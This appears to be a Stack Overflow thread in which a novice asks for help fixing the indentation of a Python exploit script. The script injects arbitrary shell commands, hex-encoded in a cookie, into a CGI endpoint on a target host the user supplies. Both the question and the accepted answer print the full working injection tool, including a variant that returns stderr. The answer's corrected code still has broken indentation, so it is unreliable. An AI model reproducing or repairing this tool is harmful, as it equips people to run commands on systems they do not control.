# windows Python Name error

Tags: python, python-2.7, python-3.x, argv, nameerror

I am getting name error for this code. 
error message: Traceback (most recent call last):
  File "D:\injection.py", line 16, in 
    opts, args = getopt.getopt(argv, "h", ["help", "target="])
NameError: name 'argv' is not defined

```
#!/usr/bin/python

import sys
import getopt
import urllib

# define hexEncode function
hexEncode = lambda x:"".join([hex(ord(c))[2:].zfill(2) for c in x])

def main(argv):
        # set defaults
        target = None

   # parse command line options
try:
    opts, args = getopt.getopt(argv, "h", ["help", "target="])
except getopt.GetoptError:
            usage()
sys.exit(2)
for opt, arg in opts:
    if opt in ("-h", "--help"):
        usage()
        sys.exit()
    elif opt in ("--target"):
        target = arg

if target is None:
    target = raw_input("Enter target (hostname or IP): ")
url = "http://" + target + "/cgi-bin/show/landing"
command = raw_input("Enter command to inject: ")
encodedCommand = hexEncode("' .; " + command + ";'")
# uncomment the hacky line below if you want stderr output in the response 
#encodedCommand = hexEncode("' .; " + command + "&> /tmp/a; cat /tmp/a;'")

opener = urllib.build_opener()
opener.addheaders.append(('Cookie', 'access_token=' + encodedCommand))
response = opener.open(url)
content = response.read()

print ("-----------------------------------------------------")
print ("GET " + url)
print ("Cookie: access_token=" + encodedCommand)
print ("-----------------------------------------------------")
print (content)

def usage():
print ("Usage: web-command-injection.py [options] ...")
print ("Configuration:")
print ("  --target=<hostname or IP>    Sets the target host.")
print ("Miscellaneous:")
print ("  -h                           Print usage options.")
print ("\n")

if __name__ == "__main__":
main(sys.argv[1:])
```

Can anyone help me fix the problem.this code works flawless in linux but not in windows

Comment: Your issue is your indenting.  Your `try` statement is not in your `main` function.

Comment: how to fix that i am totally new to python, working on project then came across this code , please help me fix this

Comment: Code has to be consistently indented to be part of a function.  Break the indentation (as you have) and that marks end of function.

Comment: This code won't work in linux either.  You'll get the same error.  Maybe you just cut and pasted from linux to windows without changing line endings.  If you don't understand why or where you need to indent, you need to read some Python tutorials.  I can't help you with that.

Comment: this is the link to that code. [link](https://gist.github.com/benjholla/0c2497ad52de5896681b) . this code worked well in linux. but i was getting indent error in windows but not in linux. i did some reading and tried to fix, but still getting the error at try

Comment: this is the error i am getting http://s17.postimg.org/hciiugk4f/python.jpg

Comment: did most of the fixing . now down to this error http://s9.postimg.org/gzy77mg8f/python.jpg

Answer (score 0, accepted):

There are couple of indentation errors. Try this,

```
# define hexEncode function
hexEncode = lambda x:"".join([hex(ord(c))[2:].zfill(2) for c in x])

def main(argv):
    # set defaults
    target = None

    # parse command line options
    try:
        opts, args = getopt.getopt(argv, "h", ["help", "target="])
    except getopt.GetoptError:
                usage()
    sys.exit(2)
    for opt, arg in opts:
        if opt in ("-h", "--help"):
            usage()
            sys.exit()
        elif opt in ("--target"):
            target = arg

    if target is None:
        target = raw_input("Enter target (hostname or IP): ")
    url = "http://" + target + "/cgi-bin/show/landing"
    command = raw_input("Enter command to inject: ")
    encodedCommand = hexEncode("' .; " + command + ";'")
    # uncomment the hacky line below if you want stderr output in the response
    #encodedCommand = hexEncode("' .; " + command + "&> /tmp/a; cat /tmp/a;'")

    opener = urllib.build_opener()
    opener.addheaders.append(('Cookie', 'access_token=' + encodedCommand))
    response = opener.open(url)
    content = response.read()

    print ("-----------------------------------------------------")
    print ("GET " + url)
    print ("Cookie: access_token=" + encodedCommand)
    print ("-----------------------------------------------------")
    print (content)

    def usage():
    print ("Usage: web-command-injection.py [options] ...")
    print ("Configuration:")
    print ("  --target=<hostname or IP>    Sets the target host.")
    print ("Miscellaneous:")
    print ("  -h                           Print usage options.")
    print ("\n")

if __name__ == "__main__":
main(sys.argv[1:])
```

Comment: http://s9.postimg.org/gzy77mg8f/python.jpg did most of the fixing now down to this error

Comment: Are you using python 3.0 ? If so then try using input() instead of raw_input ()

Comment: Thank You all, I was able to fix it.

Comment: What was the error ? How did you fix it ? If any of the comments or answers helped up vote them or mark them as the answer.